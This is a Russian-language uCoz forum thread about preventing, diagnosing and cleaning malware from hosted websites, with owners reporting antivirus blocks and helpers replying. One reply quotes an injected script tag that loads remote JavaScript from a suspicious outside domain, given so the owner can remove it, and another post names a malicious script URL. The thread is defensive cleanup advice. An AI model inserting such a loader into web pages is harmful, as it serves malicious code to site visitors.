Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    antoni4782
    Сообщений: 2
    Репутация: 0

    Сообщение # 151 | 21:27:35 14 Июн 2013
    Почему блокируются http://sitebook.ge/? На сайте есть не malware, Результаты: http://sitecheck.sucuri.net/results/sitebook.ge/. Я призываю администрацию поднять блок. Приносим свои извинения за плохие русские. спасибо
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 152 | 21:44:55 14 Июн 2013
    antoni4782, пишите в тех.поддержку
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    19a64s
    Сообщений: 12
    Репутация: 0

    Сообщение # 153 | 10:30:11 15 Июн 2013
    Здравствуйте.Без разницы, гость, админ....Блокирует. Как бороться? На других антивирусниках тишина,проблем нет....
    Сообщение отредактировал 19a64s - Суббота, 15 Июн 2013, 10:33:37
    fcsm367
    Сообщений: 23
    Репутация: 0

    Сообщение # 154 | 20:30:48 15 Июн 2013
    Перешел на свой сайт с поисковика google, и мой касперский выдал мне вирус,при чем мне до этого говарили, что на сайте вирус,вот убедился в этом сам...
    мой сайт http://torfiles.ru/

    Прикрепления: 6333090.jpg (249.4 Kb)
    Сообщение отредактировал fcsm367 - Суббота, 15 Июн 2013, 20:31:22
    Dan274
    Сообщений: 25
    Репутация: 0

    Сообщение # 155 | 19:26:02 17 Июн 2013
    Здравствуйте, мой сайт http://easygames.biz/ , яндекс время от времени обнаруживает вредоносный код с вердиктом "поведенческий анализ", но об этом мы уже здесь общались. При обращении в службу поддержки яндекса получил такой отверт: "Сейчас при последней проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующий вредоносный ресурс: webservice1.net при посещении сайта с мобильных устройств". Есть идеи где может находиться этот зловредный код или кто-нибудь уже с такой проблемой сталкивался?
    NZT
    Сообщений: 369
    Репутация: 483

    Сообщение # 156 | 21:04:00 17 Июн 2013
    Dan274, Мельком глянул Ваш сайт. Вредоносный код не нашел (и не искал)... а вот вопрос возник:
    Не пробовали в конце документов закрывающие теги ставить?...........</html>
    Или это щас не модно?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 157 | 21:40:26 17 Июн 2013
    NZT,
    Цитата
    Не пробовали в конце документов закрывающие теги ставить?...........</html>
    и без них даже в осле прекрасно работает, но зато высекается на корню счетчик опенстата. но это все крайне не по теме

    Dan274, какие страницы в списке? опять страницы материала? такой вердикт яндекс обычно вешает из-за рекламы. какая реклама у вас на сайте? директ и гугл. вот и все. искала в коде и все чисто. рекламу не вскрывала, но опять же сымитировать мобильный трафик определенного провайдера для проверки я не смогу и вряд ли кто сможет. такое словить тяжко, но у меня большие сомнения, что есть что ловить
    было мнение, что если ставить директ и гугль рядом могут быть возмущения на последнего, но это мнение лишь слухи, научно не подтвержденные
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Dan274
    Сообщений: 25
    Репутация: 0

    Сообщение # 158 | 23:21:37 17 Июн 2013
    Цитата (NZT)
    Или это щас не модно?
    Наверно нет)
    Цитата (webanet)
    искала в коде и все чисто
    Да то что в коде ничего нет я уже понял, слышал что мобильным редиректом сайты заражают например через htaccess, ну а раз на uCoz его нет, то возможно эта зараза каким другим способом на сайт проползает. Ладно, спасибо за совет на счёт рекламы, уберу одну из партнёрок и посмотрю что дальше будет...
    Allaia
    Сообщений: 4
    Репутация: 0

    Сообщение # 159 | 13:21:48 19 Июн 2013
    Добрый день! на сайте завелся вирус. Не пойму откуда. Доступ есть только у меня к сайту.
    И для гостя и под логином срабатывает.
    На главной странице.
    У кого то вообще не дает на сайт зайти.
    У меня сообщение антивирус выдает.
    Помогите пожалуйста. Как избавиться от него?
    http://epoha.pw/

    Прикрепления: 6967395.png (459.1 Kb)
    Сообщение отредактировал Allaia - Среда, 19 Июн 2013, 13:27:55
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 160 | 13:28:01 19 Июн 2013
    Allaia, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    поле на что заменить оставляете пустым и производите замену во всех модулях

    после очистки ОБЯЗАТЕЛЬНО изменяете пароль uID профиля, которым администрируете сайт. инструкция по смене находится тут //forum.ucoz.ru/forum/45-52299-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Allaia
    Сообщений: 4
    Репутация: 0

    Сообщение # 161 | 13:30:24 19 Июн 2013
    webanet, Спасибо большое!
    аж 11 замен было.
    Надеюсь больше не появятся.
    Все рекомендации выполнила.
    Сообщение отредактировал Allaia - Среда, 19 Июн 2013, 13:39:12
    Деееенчик
    Сообщений: 190
    Репутация: 116

    Сообщение # 162 | 14:48:25 19 Июн 2013
    Люди помогите пожалуйста,мой сайт www.on-livebox.com у меня не открывается,а у других людей открывается,и еще есть подозрение на вирус,вот мне человек написал "у меня твой сайт открывается и работает - но при загрузки твоего сайта - выскакивает предупреждение от антивируса - с запретом вредоносной ссылки - вот такого содержания : tsed.js Запрещено: ....http://china-air.ru/tsed.js.... (проверка по базе вредоносных веб-адресов) 19.06.2013 4:25:22 ...http://china-air.ru/..... "

    Добавлено (19 Июн 2013, 14:48:25)
    ---------------------------------------------
    Я вычислил код,но как я его убрать?,если Вы ничего не сможете придумать,то тогда я попробую удалить код через компьютер друга.

    Благодарности в репутацию и в награды!
    P.S Плюс под аватаркой)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 163 | 14:51:29 19 Июн 2013
    Деееенчик, код находится в просилке зайти и зарегистрироваться. если не открывается сайт пишем сюда //forum.ucoz.ru/forum/35-10703-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ExtrimKH
    Сообщений: 2
    Репутация: 0

    Сообщение # 164 | 18:29:28 19 Июн 2013
    Вообщем ситуация такова неделю как сайт в индексации, всё хорошо! Но Буквально вчера мне заявляют что на сайте вирусы...
    Я в не доумение что делать как быть, как вылечить. Прогоняя через онлайн проверку получил такой список:
    Проверка сайта http://extrimkh.ucoz.ua
    Сайт был проверен ранее: 19/06/2013 14:29:05
    Тип проверки: полная (antivirus-alarm + мировые антивирусные базы)
    Список проверяемых файлов:
    1. http://mc.yandex.ru/metrika/watch.js, тип файла: javascript
    2. http://extrimkh.ucoz.ua/abnl/?begun=1&l=DE&u0=DE%7CaO3OTU%7C0%7Cs26&ref=, тип файла: iframe html
    3. http://spotsniper.ru/?pid=6&l=DE&u0=DE%7CaO3OTU%7C0%7Cs26&ref=, тип файла: javascript
    4. http://s26.ucoz.net/src/uwnd.js?2, тип файла: javascript
    5. http://s26.ucoz.net/src/ulightbox/ulightbox.js, тип файла: javascript
    6. http://s26.ucoz.net/src/jquery-1.7.2.js, тип файла: javascript
    7. http://extrimkh.ucoz.ua/, тип файла: html

    Антивирусная база Результаты

    MicroWorld-eScan вирусов нет
    nProtect вирусов нет
    CAT-QuickHeal вирусов нет
    cAfee вирусов нет
    Malwarebytes вирусов нет
    TheHacker вирусов нет
    K7GW вирусов нет
    K7AntiVirus вирусов нет
    NANO-Antivirus вирусов нет
    F-Prot вирусов нет
    Symantec вирусов нет
    Norman Iframe.WC
    TotalDefense вирусов нет
    TrendMicro-HouseCall вирусов нет
    Avast вирусов нет
    eSafe вирусов нет
    ClamAV вирусов нет
    Kaspersky вирусов нет
    BitDefender вирусов нет
    Agnitum вирусов нет
    ViRobot вирусов нет
    ByteHero вирусов нет
    Sophos вирусов нет
    Comodo вирусов нет
    F-Secure вирусов нет
    DrWeb вирусов нет
    VIPRE вирусов нет
    AntiVir вирусов нет
    TrendMicro вирусов нет
    McAfee-GW-Edition вирусов нет
    Emsisoft вирусов нет
    Jiangmin вирусов нет
    Antiy-AVL вирусов нет
    Kingsoft вирусов нет
    Microsoft вирусов нет
    SUPERAntiSpyware вирусов нет
    GData вирусов нет
    Commtouch вирусов нет
    AhnLab-V3 вирусов нет
    VBA32 вирусов нет
    PCTools вирусов нет
    ESET-NOD32 вирусов нет
    Rising вирусов нет
    Ikarus Exploit.HTML.IframeRef
    Fortinet вирусов нет
    AVG вирусов нет
    Panda вирусов нет

    блокирует с главной Extrimkh.ucoz.ua я вот думаю а не может это быть с рекламы юкоза выбивать ошибки?
    Как-то не хорошо просто в процессе пришлось убрать все возможные ссылки которые могли бы навредить и тому подобное...
    Но к сожеление некоторые мне нужны на сайты которые не заражены ничем (проверял)
    Подскажите как быть и что делать?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 165 | 18:39:34 19 Июн 2013
    ExtrimKH, вы уже очищали сайт? если да, то зачем сюда пишете. или скажите что вы удалили
    и ещё автосерф запрещен в системе
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: